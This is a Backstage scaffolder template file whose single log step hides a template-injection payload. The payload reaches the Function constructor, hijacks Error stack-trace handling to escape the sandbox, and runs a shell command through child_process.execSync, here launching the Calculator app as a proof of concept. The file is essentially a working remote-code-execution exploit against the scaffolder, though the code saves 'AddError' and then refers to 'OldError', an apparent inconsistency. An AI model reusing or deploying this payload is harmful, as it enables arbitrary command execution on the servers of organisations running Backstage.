apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: template-name
  title: template-title
  description: The place to be, for great artists
spec:
  type: service
  owner: backstage/techdocs-core
  
  steps:
    - id: log-message
      name: Log Message
      action: debug:log
      input:
        message: Hello ${{range.constructor("this.env.__proto__.renderString = function() {globalThis.AddError = globalThis.Error;globalThis.Error = class Error {};globalThis.Error.prepareStackTrace = (cs,trace) => {trace[2].getThis().process.mainModule.require(\"child_process\").execSync(\"System/Applications/Calculator.app/Contents/MacOs/Calculator\"); };const {stack} = new globalThis.OldError();}")().triggerException()}}
